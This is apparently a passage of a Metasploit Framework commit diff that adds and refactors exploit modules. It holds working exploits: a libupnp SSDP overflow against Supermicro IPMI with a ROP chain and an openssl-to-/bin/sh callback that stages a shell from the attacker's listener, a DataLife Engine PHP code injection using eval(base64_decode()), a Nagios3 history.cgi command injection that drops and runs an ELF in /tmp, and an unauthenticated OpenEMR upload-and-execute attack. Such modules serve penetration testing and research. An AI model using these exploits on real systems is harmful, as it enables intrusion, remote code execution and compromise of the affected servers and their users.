+ [ 'URL', 'https://community.rapid7.com/community/infosec/blog/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play' ]
+ ],
+ 'Platform' => ['unix'],
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => true,
+ 'Payload' =>
+ {
+#
+# # The following BadChars do not apply since we stage the payload
+# # through a secondary connection. This is just for reference.
+#
+# 'BadChars' =>
+# # Bytes 0-8 are not allowed
+# [*(0..8)].pack("C*") +
+# # 0x09, 0x0a, 0x0d are allowed
+# "\x0b\x0c\x0e\x0f" +
+# # All remaining bytes up to space are restricted
+# [*(0x10..0x1f)].pack("C*") +
+# # Also not allowed
+# "\x7f\x3a" +
+# # Breaks our string quoting
+# "\x22",
+
+ # Unlimited since we stage this over a secondary connection
+ 'Space' => 8000,
+ 'DisableNops' => true,
+ 'Compat' =>
+ {
+ 'PayloadType' => 'cmd',
+ # specific payloads vary widely by device (openssl for IPMI, etc)
+ }
+ },
+ 'Targets' =>
+ [
+
+ [ "Automatic", { } ],
+
+ #
+ # ROP targets are difficult to represent in the hash, use callbacks instead
+ #
+ [ "Supermicro Onboard IPMI (X9SCL/X9SCM) Intel SDK 1.3.1", {
+
+ # The callback handles all target-specific settings
+ :callback => :target_supermicro_ipmi_131,
+
+ # This matches any line of the SSDP M-SEARCH response
+ :fingerprint =>
+ /Server:\s*Linux\/2\.6\.17\.WB_WPCM450\.1\.3 UPnP\/1\.0, Intel SDK for UPnP devices\/1\.3\.1/mi
+
+ #
+ # SSDP response:
+ # Linux/2.6.17.WB_WPCM450.1.3 UPnP/1.0, Intel SDK for UPnP devices/1.3.1
+ # http://192.168.xx.xx:49152/IPMIdevicedesc.xml
+ # uuid:Upnp-IPMI-1_0-1234567890001::upnp:rootdevice
+
+ # Approximately 35,000 of these found in the wild via critical.io scans (2013-02-03)
+
+ } ],
+
+ [ "Debug Target", {
+
+ # The callback handles all target-specific settings
+ :callback => :target_debug
+
+ } ]
+
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Jan 29 2013'))
+
+ register_options(
+ [
+ Opt::RHOST(),
+ Opt::RPORT(1900),
+ OptAddress.new('CBHOST', [ false, "The listener address used for staging the real payload" ]),
+ OptPort.new('CBPORT', [ false, "The listener port used for staging the real payload" ])
+ ], self.class)
+ end
+
+
+ def exploit
+
+ configure_socket
+
+ target_info = choose_target
+
+ unless self.respond_to?(target_info[:callback])
+ print_error("Invalid target specified: no callback function defined")
+ return
+ end
+
+ buffer = self.send(target_info[:callback])
+ pkt =
+ "M-SEARCH * HTTP/1.1\r\n" +
+ "Host:239.255.255.250:1900\r\n" +
+ "ST:uuid:schemas:device:" + buffer + ":end\r\n" +
+ "Man:\"ssdp:discover\"\r\n" +
+ "MX:3\r\n\r\n"
+
+ print_status("Exploiting #{rhost} with target '#{target_info.name}' with #{pkt.length} bytes to port #{rport}...")
+
+ r = udp_sock.sendto(pkt, rhost, rport, 0)
+
+ 1.upto(5) do
+ ::IO.select(nil, nil, nil, 1)
+ break if session_created?
+ end
+
+ # No handler() support right now
+ end
+
+
+
+ # These devices are armle, run version 1.3.1 of libupnp, have random stacks, but no PIE on libc
+ def target_supermicro_ipmi_131
+
+ # Create a fixed-size buffer for the payload
+ buffer = Rex::Text.rand_text_alpha(2000)
+
+ # Place the entire buffer inside of double-quotes to take advantage of is_qdtext_char()
+ buffer[0,1] = '"'
+ buffer[1999,1] = '"'
+
+ # Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
+ cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
+
+ # Start a listener
+ start_listener(true)
+
+ # Figure out the port we picked
+ cbport = self.service.getsockname[2]
+
+ # Restart the service and use openssl to stage the real payload
+ # Staged because only ~150 bytes of contiguous data are available before mangling
+ cmd = "sleep 1;/bin/upnp_dev & echo; openssl s_client -quiet -host #{cbhost} -port #{cbport}|/bin/sh;exit;#"
+ buffer[432, cmd.length] = cmd
+
+ # Adjust $r3 to point from the bottom of the stack back into our buffer
+ buffer[304,4] = [0x4009daf8].pack("V") #
+ # 0x4009daf8: add r3, r3, r4, lsl #2
+ # 0x4009dafc: ldr r0, [r3, #512] ; 0x200
+ # 0x4009db00: pop {r4, r10, pc}
+
+ # The offset (right-shifted by 2 ) to our command string above
+ buffer[284,4] = [0xfffffe78].pack("V") #
+
+ # Copy $r3 into $r0
+ buffer[316,4] = [0x400db0ac].pack("V")
+ # 0x400db0ac <_IO_wfile_underflow+1184>: sub r0, r3, #1
+ # 0x400db0b0 <_IO_wfile_underflow+1188>: pop {pc} ; (ldr pc, [sp], #4)
+
+ # Move our stack pointer down so as not to corrupt our payload
+ buffer[320,4] = [0x400a5568].pack("V")
+ # 0x400a5568 <__default_rt_sa_restorer_v2+5448>: add sp, sp, #408 ; 0x198
+ # 0x400a556c <__default_rt_sa_restorer_v2+5452>: pop {r4, r5, pc}
+
+ # Finally return to system() with $r0 pointing to our string
+ buffer[141,4] = [0x400add8c].pack("V")
+
+ return buffer
+=begin
+ 00008000-00029000 r-xp 00000000 08:01 709233 /bin/upnp_dev
+ 00031000-00032000 rwxp 00021000 08:01 709233 /bin/upnp_dev
+ 00032000-00055000 rwxp 00000000 00:00 0 [heap]
+ 40000000-40015000 r-xp 00000000 08:01 709562 /lib/ld-2.3.5.so
+ 40015000-40017000 rwxp 00000000 00:00 0
+ 4001c000-4001d000 r-xp 00014000 08:01 709562 /lib/ld-2.3.5.so
+ 4001d000-4001e000 rwxp 00015000 08:01 709562 /lib/ld-2.3.5.so
+ 4001e000-4002d000 r-xp 00000000 08:01 709535 /lib/libpthread-0.10.so
+ 4002d000-40034000 ---p 0000f000 08:01 709535 /lib/libpthread-0.10.so
+ 40034000-40035000 r-xp 0000e000 08:01 709535 /lib/libpthread-0.10.so
+ 40035000-40036000 rwxp 0000f000 08:01 709535 /lib/libpthread-0.10.so
+ 40036000-40078000 rwxp 00000000 00:00 0
+ 40078000-40180000 r-xp 00000000 08:01 709620 /lib/libc-2.3.5.so
+ 40180000-40182000 r-xp 00108000 08:01 709620 /lib/libc-2.3.5.so
+ 40182000-40185000 rwxp 0010a000 08:01 709620 /lib/libc-2.3.5.so
+ 40185000-40187000 rwxp 00000000 00:00 0
+ bd600000-bd601000 ---p 00000000 00:00 0
+ bd601000-bd800000 rwxp 00000000 00:00 0
+ bd800000-bd801000 ---p 00000000 00:00 0
+ bd801000-bda00000 rwxp 00000000 00:00 0
+ bdc00000-bdc01000 ---p 00000000 00:00 0
+ bdc01000-bde00000 rwxp 00000000 00:00 0
+ be000000-be001000 ---p 00000000 00:00 0
+ be001000-be200000 rwxp 00000000 00:00 0
+ be941000-be956000 rwxp 00000000 00:00 0 [stack]
+=end
+
+ end
+
+ # Generate a buffer that provides a starting point for exploit development
+ def target_debug
+ buffer = Rex::Text.pattern_create(2000)
+ end
+
+ def stage_real_payload(cli)
+ print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
+ cli.put(payload.encoded + "\n")
+ end
+
+ def start_listener(ssl = false)
+
+ comm = datastore['ListenerComm']
+ if comm == "local"
+ comm = ::Rex::Socket::Comm::Local
+ else
+ comm = nil
+ end
+
+ self.service = Rex::Socket::TcpServer.create(
+ 'LocalPort' => datastore['CBPORT'],
+ 'SSL' => ssl,
+ 'SSLCert' => datastore['SSLCert'],
+ 'Comm' => comm,
+ 'Context' =>
+ {
+ 'Msf' => framework,
+ 'MsfExploit' => self,
+ })
+
+ self.service.on_client_connect_proc = Proc.new { |client|
+ stage_real_payload(client)
+ }
+
+ # Start the listening service
+ self.service.start
+ end
+
+ #
+ # Shut down any running services
+ #
+ def cleanup
+ super
+ if self.service
+ print_status("Shutting down payload stager listener...")
+ begin
+ self.service.deref if self.service.kind_of?(Rex::Service)
+ if self.service.kind_of?(Rex::Socket)
+ self.service.close
+ self.service.stop
+ end
+ self.service = nil
+ rescue ::Exception
+ end
+ end
+ end
+
+ def choose_target
+ # If the user specified a target, use that one
+ return self.target unless self.target.name =~ /Automatic/
+
+ msearch =
+ "M-SEARCH * HTTP/1.1\r\n" +
+ "Host:239.255.255.250:1900\r\n" +
+ "ST:upnp:rootdevice\r\n" +
+ "Man:\"ssdp:discover\"\r\n" +
+ "MX:3\r\n\r\n"
+
+ # Fingerprint the service through SSDP
+ udp_sock.sendto(msearch, rhost, rport, 0)
+
+ res = nil
+ 1.upto(5) do
+ res,addr,info = udp_sock.recvfrom(65535, 1.0)
+ break if res and res =~ /^(Server|Location)/mi
+ udp_sock.sendto(msearch, rhost, rport, 0)
+ end
+
+ self.targets.each do |t|
+ return t if t[:fingerprint] and res =~ t[:fingerprint]
+ end
+
+ if res and res.to_s.length > 0
+ print_status("No target matches this fingerprint")
+ print_status("")
+ res.to_s.split("\n").each do |line|
+ print_status(" #{line.strip}")
+ end
+ print_status("")
+ else
+ print_status("The system #{rhost} did not reply to our M-SEARCH probe")
+ end
+
+ fail_with(Exploit::Failure::NoTarget, "No compatible target detected")
+ end
+
+ # Accessor for our TCP payload stager
+ attr_accessor :service
+
+ # We need an unconnected socket because SSDP replies often come
+ # from a different sent port than the one we sent to. This also
+ # breaks the standard UDP mixin.
+ def configure_socket
+ self.udp_sock = Rex::Socket::Udp.create({
+ 'Context' => { 'Msf' => framework, 'MsfExploit' => self }
+ })
+ add_socket(self.udp_sock)
+ end
+
+ #
+ # Required since we aren't using the normal mixins
+ #
+
+ def rhost
+ datastore['RHOST']
+ end
+
+ def rport
+ datastore['RPORT']
+ end
+
+ # Accessor for our UDP socket
+ attr_accessor :udp_sock
+
+end
diff --git a/modules/exploits/unix/webapp/basilic_diff_exec.rb b/modules/exploits/unix/webapp/basilic_diff_exec.rb
index 3fde5b946af7..c8a99cdb92fe 100644
--- a/modules/exploits/unix/webapp/basilic_diff_exec.rb
+++ b/modules/exploits/unix/webapp/basilic_diff_exec.rb
@@ -61,12 +61,11 @@ def initialize(info = {})
def check
base = normalize_uri(target_uri.path)
- base << '/' if base[-1, 1] != '/'
sig = rand_text_alpha(10)
res = send_request_cgi({
- 'uri' => "/#{base}/Config/diff.php",
+ 'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => sig,
'new' => '1',
@@ -86,10 +85,9 @@ def exploit
print_status("Sending GET request...")
base = normalize_uri(target_uri.path)
- base << '/' if base[-1, 1] != '/'
res = send_request_cgi({
- 'uri' => "/#{base}/Config/diff.php",
+ 'uri' => normalize_uri("/#{base}/Config/diff.php"),
'vars_get' => {
'file' => "&#{payload.encoded} #",
'new' => '1',
diff --git a/modules/exploits/unix/webapp/coppermine_piceditor.rb b/modules/exploits/unix/webapp/coppermine_piceditor.rb
index 772eeb722c0a..170db130fce6 100644
--- a/modules/exploits/unix/webapp/coppermine_piceditor.rb
+++ b/modules/exploits/unix/webapp/coppermine_piceditor.rb
@@ -71,7 +71,7 @@ def initialize(info = {})
def check
res = send_request_raw({
- 'uri' => normalize_uri(datastore['URI']) + '/picEditor.php'
+ 'uri' => normalize_uri(datastore['URI'], '/picEditor.php')
}, 25)
if (res and res.body =~ /Coppermine Picture Editor/i)
@@ -98,7 +98,7 @@ def exploit
res = send_request_cgi({
'method' => 'POST',
- 'uri' => normalize_uri(datastore['URI']) + "/picEditor.php",
+ 'uri' => normalize_uri(datastore['URI'], "/picEditor.php"),
'vars_post' =>
{
'angle' => angle,
diff --git a/modules/exploits/unix/webapp/datalife_preview_exec.rb b/modules/exploits/unix/webapp/datalife_preview_exec.rb
new file mode 100644
index 000000000000..7497dd6f9bfa
--- /dev/null
+++ b/modules/exploits/unix/webapp/datalife_preview_exec.rb
@@ -0,0 +1,95 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'DataLife Engine preview.php PHP Code Injection',
+ 'Description' => %q{
+ This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
+ The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
+ with the e modifier, which allows to inject arbitrary php code, when there is a
+ template installed which contains a [catlist] or [not-catlist] tag, even when the
+ template isn't in use currently. The template can be configured with the TEMPLATE
+ datastore option.
+ },
+ 'Author' =>
+ [
+ 'EgiX', # Vulnerability discovery
+ 'juan vazquez' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2013-1412' ],
+ [ 'BID', '57603' ],
+ [ 'EDB', '24438' ],
+ [ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
+ [ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
+ ],
+ 'Privileged' => false,
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Payload' =>
+ {
+ 'Keys' => ['php']
+ },
+ 'DisclosureDate' => 'Jan 28 2013',
+ 'Targets' => [ ['DataLife Engine 9.7', { }], ],
+ 'DefaultTarget' => 0
+ ))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
+ OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
+ ], self.class)
+ end
+
+ def uri
+ normalize_uri(target_uri.path, 'engine', 'preview.php')
+ end
+
+ def send_injection(inj)
+ res = send_request_cgi(
+ {
+ 'uri' => uri,
+ 'method' => 'POST',
+ 'vars_post' =>
+ {
+ 'catlist[0]' => inj
+ },
+ 'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
+ })
+ res
+ end
+
+ def check
+ fingerprint = rand_text_alpha(4+rand(4))
+
+ res = send_injection("#{rand_text_alpha(4+rand(4))}')||printf(\"#{fingerprint}\");//")
+
+ if res and res.code == 200 and res.body =~ /#{fingerprint}/
+ return Exploit::CheckCode::Vulnerable
+ else
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def exploit
+ @peer = "#{rhost}:#{rport}"
+
+ print_status("#{@peer} - Exploiting the preg_replace() to execute PHP code")
+ res = send_injection("#{rand_text_alpha(4+rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
+ end
+end
diff --git a/modules/exploits/unix/webapp/egallery_upload_exec.rb b/modules/exploits/unix/webapp/egallery_upload_exec.rb
index 58b051af1b8f..9dc2044cd7e1 100644
--- a/modules/exploits/unix/webapp/egallery_upload_exec.rb
+++ b/modules/exploits/unix/webapp/egallery_upload_exec.rb
@@ -58,12 +58,11 @@ def initialize(info={})
end
def check
- uri = normalize_uri(target_uri.path)
- uri << '/' if uri[-1,1] != '/'
+ uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{uri}egallery/uploadify.php"
+ 'uri' => normalize_uri(uri, "egallery", "uploadify.php")
})
if res and res.code == 200 and res.body.empty?
@@ -97,7 +96,7 @@ def exploit
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_cgi({
'method' => 'POST',
- 'uri' => "#{uri}egallery/uploadify.php",
+ 'uri' => normalize_uri("#{uri}egallery/uploadify.php"),
'ctype' => "multipart/form-data; boundary=#{boundary}",
'data' => post_data
})
@@ -113,7 +112,7 @@ def exploit
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
- 'uri' => "#{uri}#{payload_name}"
+ 'uri' => normalize_uri("#{uri}#{payload_name}")
})
# If we don't get a 200 when we request our malicious payload, we suspect
diff --git a/modules/exploits/unix/webapp/joomla_tinybrowser.rb b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
index 0ccb1efcfdfd..c7fa522c9fd6 100644
--- a/modules/exploits/unix/webapp/joomla_tinybrowser.rb
+++ b/modules/exploits/unix/webapp/joomla_tinybrowser.rb
@@ -54,9 +54,8 @@ def initialize(info = {})
end
def check
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php?type=file&folder='
+ uri = normalize_uri(datastore['URI'], 'plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php')
+ uri << '?type=file&folder='
res = send_request_raw(
{
'uri' => uri
diff --git a/modules/exploits/unix/webapp/nagios3_history_cgi.rb b/modules/exploits/unix/webapp/nagios3_history_cgi.rb
new file mode 100644
index 000000000000..39b3e8fe2868
--- /dev/null
+++ b/modules/exploits/unix/webapp/nagios3_history_cgi.rb
@@ -0,0 +1,254 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::EXE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Nagios3 history.cgi Host Command Execution',
+ 'Description' => %q{
+ This module abuses a command injection vulnerability in the
+ Nagios3 history.cgi script.
+ },
+ 'Author' => [
+ 'Unknown ', # Original finding
+ 'blasty ', # First working exploit
+ 'Jose Selvi ', # Metasploit module
+ 'Daniele Martini ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'CVE', '2012-6096' ],
+ [ 'OSVDB', '88322' ],
+ [ 'BID', '56879' ],
+ [ 'EDB', '24084' ],
+ [ 'URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2012-December/089125.html' ]
+ ],
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ ARCH_X86 ],
+ 'Privileged' => false,
+ 'Payload' =>
+ {
+ 'Space' => 200, # Due to a system() parameter length limitation
+ 'BadChars' => '', # It'll be base64 encoded
+ },
+ 'Targets' =>
+ [
+ [ 'Automatic Target', { 'auto' => true }],
+ # NOTE: All addresses are from the history.cgi binary
+ [ 'Appliance Nagios XI 2012R1.3 (CentOS 6.x)',
+ {
+ 'BannerRE' => 'Apache/2.2.15 (CentOS)',
+ 'VersionRE' => '3.4.1',
+ 'Arch' => ARCH_X86,
+ 'Offset' => 0xc43,
+ 'RopStack' =>
+ [
+ 0x0804c260, # unescape_cgi_input()
+ 0x08048f04, # pop, ret
+ 0x08079b60, # buffer addr
+ 0x08048bb0, # system()
+ 0x08048e70, # exit()
+ 0x08079b60 # buffer addr
+ ]
+ }
+ ],
+ [ 'Debian 5 (nagios3_3.0.6-4~lenny2_i386.deb)',
+ {
+ 'BannerRE' => 'Apache/2.2.9 (Debian)',
+ 'VersionRE' => '3.0.6',
+ 'Arch' => ARCH_X86,
+ 'Offset' => 0xc37,
+ 'RopStack' =>
+ [
+ 0x0804b620, # unescape_cgi_input()
+ 0x08048fe4, # pop, ret
+ 0x080727a0, # buffer addr
+ 0x08048c7c, # system()
+ 0xdeafbabe, # if should be exit() but it's not
+ 0x080727a0 # buffer addr
+ ]
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Dec 09 2012'))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, "The full URI path to history.cgi", "/nagios3/cgi-bin/history.cgi"]),
+ OptString.new('USER', [false, "The username to authenticate with", "nagiosadmin"]),
+ OptString.new('PASS', [false, "The password to authenticate with", "nagiosadmin"]),
+ ], self.class)
+ end
+
+ def detect_version(uri)
+ # Send request
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => uri,
+ 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
+ }, 10)
+
+ # Error handling
+ if res.nil?
+ print_error("Unable to get a response from the server")
+ return nil, nil
+ end
+ if(res.code == 401)
+ print_error("Please specify correct values for USER and PASS")
+ return nil, nil
+ end
+ if(res.code == 404)
+ print_error("Please specify the correct path to history.cgi in the URI parameter")
+ return nil, nil
+ end
+
+ # Extract banner from response
+ banner = res.headers['Server']
+
+ # Extract version from body
+ version = nil
+ version_line = res.body.match(/Nagios® (Core™ )?[0-9.]+ -/)
+ if not version_line.nil?
+ version = version_line[0].match(/[0-9.]+/)[0]
+ end
+
+ # Check in an alert exists
+ alert = res.body.match(/ALERT/)
+
+ return version, banner, alert
+ end
+
+ def select_target(version, banner)
+
+ # No banner and version, no target
+ if banner.nil? or version.nil?
+ return nil
+ end
+
+ # Get version information
+ print_status("Web Server banner: #{banner}")
+ print_status("Nagios version detected: #{version}")
+
+ # Try regex for each target
+ self.targets.each do |t|
+ if t['BannerRE'].nil? or t['VersionRE'].nil? # It doesn't exist in Auto Target
+ next
+ end
+ regexp1 = Regexp.escape(t['BannerRE'])
+ regexp2 = Regexp.escape(t['VersionRE'])
+ if ( banner =~ /#{regexp1}/ and version =~ /#{regexp2}/ ) then
+ return t
+ end
+ end
+ # If not detected, return nil
+ return nil
+ end
+
+ def check
+ print_status("Checking banner and version...")
+ # Detect version
+ banner, version, alert = detect_version(target_uri.path)
+ # Select target
+ mytarget = select_target(banner, version)
+
+ if mytarget.nil?
+ print_error("No matching target")
+ return CheckCode::Unknown
+ end
+
+ if alert.nil?
+ print_error("At least one ALERT is needed in order to exploit")
+ return CheckCode::Detected
+ end
+
+ return CheckCode::Vulnerable
+ end
+
+ def exploit
+ # Automatic Targeting
+ mytarget = nil
+ banner, version, alert = detect_version(target_uri.path)
+ if (target['auto'])
+ print_status("Automatically detecting the target...")
+ mytarget = select_target(banner, version)
+ if mytarget.nil?
+ fail_with(Exploit::Failure::NoTarget, "No matching target")
+ end
+ else
+ mytarget = target
+ end
+
+ print_status("Selected Target: #{mytarget.name}")
+ if alert.nil?
+ print_error("At least one ALERT is needed in order to exploit, none found in the first page, trying anyway...")
+ end
+ print_status("Sending request to http://#{rhost}:#{rport}#{target_uri.path}")
+
+ # Generate a payload ELF to execute
+ elfbin = generate_payload_exe
+ elfb64 = Rex::Text.encode_base64(elfbin)
+
+ # Generate random filename
+ tempfile = '/tmp/' + rand_text_alphanumeric(10)
+
+ # Generate command-line execution
+ if mytarget.name =~ /CentOS/
+ cmd = "echo #{elfb64}|base64 -d|tee #{tempfile};chmod 700 #{tempfile};rm -rf #{tempfile}|#{tempfile};"
+ else
+ cmd = "echo #{elfb64}|base64 -d|tee #{tempfile} |chmod +x #{tempfile};#{tempfile};rm -f #{tempfile}"
+ end
+ host_value = cmd.gsub!(' ', '${IFS}')
+
+ # Generate 'host' parameter value
+ padding_size = mytarget['Offset'] - host_value.length
+ host_value << rand_text_alphanumeric( padding_size )
+
+ # Generate ROP
+ host_value << mytarget['RopStack'].pack('V*')
+
+ # Send exploit
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => target_uri.path,
+ 'headers' => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
+ 'vars_get' =>
+ {
+ 'host' => host_value
+ }
+ })
+
+ if not res
+ if session_created?
+ print_status("Session created, enjoy!")
+ else
+ print_error("No response from the server")
+ end
+ return
+ end
+
+ if res.code == 401
+ fail_with(Exploit::Failure::NoAccess, "Please specify correct values for USER and PASS")
+ end
+
+ if res.code == 404
+ fail_with(Exploit::Failure::NotFound, "Please specify the correct path to history.cgi in the TARGETURI parameter")
+ end
+
+ print_status("Unknown response #{res.code}")
+ end
+
+end
diff --git a/modules/exploits/unix/webapp/openemr_upload_exec.rb b/modules/exploits/unix/webapp/openemr_upload_exec.rb
new file mode 100644
index 000000000000..41957608bf8b
--- /dev/null
+++ b/modules/exploits/unix/webapp/openemr_upload_exec.rb
@@ -0,0 +1,132 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::FileDropper
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => "OpenEMR PHP File Upload Vulnerability",
+ 'Description' => %q{
+ This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
+ ofc_upload_image.php file from the openflashchart library, a malicious user can
+ upload a file to the tmp-upload-images directory without any authentication, which
+ results in arbitrary code execution. The module has been tested successfully on
+ OpenEMR 4.1.1 over Ubuntu 10.04.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Gjoko Krstic ', # Discovery, PoC
+ 'juan vazquez' # Metasploit module
+ ],
+ 'References' =>
+ [
+ [ 'OSVDB', '90222' ],
+ [ 'BID', '37314' ],
+ [ 'EBD', '24492' ],
+ [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
+ [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
+ ],
+ 'Platform' => ['php'],
+ 'Arch' => ARCH_PHP,
+ 'Targets' =>
+ [
+ ['OpenEMR 4.1.1', {}]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => "Feb 13 2013",
+ 'DefaultTarget' => 0))
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
+ ], self.class)
+ end
+
+ def check
+ uri = target_uri.path
+ peer = "#{rhost}:#{rport}"
+
+ # Check version
+ print_status("#{peer} - Trying to detect installed version")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri(uri, "interface", "login", "login.php")
+ })
+
+ if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
+ version = $1
+ else
+ return Exploit::CheckCode::Unknown
+ end
+
+ print_status("#{peer} - Version #{version} detected")
+
+ if version > "4.1.1"
+ return Exploit::CheckCode::Safe
+ end
+
+ # Check for vulnerable component
+ print_status("#{peer} - Trying to detect the vulnerable component")
+
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
+ })
+
+ if res and res.code == 200 and res.body =~ /Saving your image to/
+ return Exploit::CheckCode::Detected
+ end
+
+ return Exploit::CheckCode::Safe
+ end
+
+ def exploit
+ uri = target_uri.path
+
+ peer = "#{rhost}:#{rport}"
+ payload_name = rand_text_alpha(rand(10) + 5) + '.php'
+ my_payload = payload.encoded
+
+ print_status("#{peer} - Sending PHP payload (#{payload_name})")
+ res = send_request_raw({
+ 'method' => 'POST',
+ 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
+ 'headers' => { "Content-Length" => my_payload.length.to_s },
+ 'data' => my_payload
+ })
+
+ # If the server returns 200 and the body contains our payload name,
+ # we assume we uploaded the malicious file successfully
+ if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
+ fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
+ end
+
+ register_file_for_cleanup(payload_name)
+
+ print_status("#{peer} - Executing PHP payload (#{payload_name})")
+ # Execute our payload
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
+ })
+
+ # If we don't get a 200 when we request our malicious payload, we suspect
+ # we don't have a shell, either. Print the status code for debugging purposes.
+ if res and res.code != 200
+ print_error("#{peer} - Server returned #{res.code.to_s}")
+ end
+ end
+
+end
diff --git a/modules/exploits/unix/webapp/openx_banner_edit.rb b/modules/exploits/unix/webapp/openx_banner_edit.rb
index 7f9b9cd6f0c2..546bd1cf11a7 100644
--- a/modules/exploits/unix/webapp/openx_banner_edit.rb
+++ b/modules/exploits/unix/webapp/openx_banner_edit.rb
@@ -68,9 +68,7 @@ def initialize(info = {})
end
def check
- uri = normalize_uri(datastore['URI'])
- uri << '/' if uri[-1,1] != '/'
- uri << 'www/admin/'
+ uri = normalize_uri(datastore['URI'], 'www', 'admin/')
res = send_request_raw(
{
'uri' => uri
@@ -108,9 +106,7 @@ def exploit
# Static files
img_dir = 'images/'
- uri_base = normalize_uri(datastore['URI'])
- uri_base << '/' if uri_base[-1,1] != '/'
- uri_base << 'www/'
+ uri_base = normalize_uri(datastore['URI'], 'www/')
# Need to login first :-/
cookie = openx_login(uri_base)
@@ -166,7 +162,7 @@ def openx_login(uri_base)
res = send_request_raw(
{
- 'uri' => uri_base + 'admin/index.php'
+ 'uri' => normalize_uri(uri_base, 'admin/index.php')
}, 10)
if not (res and res.body =~ /oa_cookiecheck\" value=\"([^\"]+)\"/)
return nil
@@ -176,7 +172,7 @@ def openx_login(uri_base)
res = send_request_cgi(
{
'method' => 'POST',
- 'uri' => uri_base + 'admin/index.php',
+ 'uri' => normalize_uri(uri_base, 'admin/index.php'),
'vars_post' =>
{
'oa_cookiecheck' => cookie,
@@ -201,7 +197,7 @@ def openx_login(uri_base)
def openx_find_campaign(uri_base, cookie)
res = send_request_raw(
{
- 'uri' => uri_base + 'admin/advertiser-campaigns.php',
+ 'uri' => normalize_uri(uri_base, 'admin/advertiser-campaigns.php'),
'headers' =>
{
'Cookie' => "sessionID=#{cookie}; PHPSESSID=#{cookie}",
@@ -269,7 +265,7 @@ def openx_upload_banner(uri_base, cookie, adv_id, camp_id, code_img)
res = send_request_raw(
{
- 'uri' => uri_base + "admin/banner-edit.php",
+ 'uri' => normalize_uri(uri_base, "admin/banner-edit.php"),
'method' => 'POST',
'data' => data,
'headers' =>
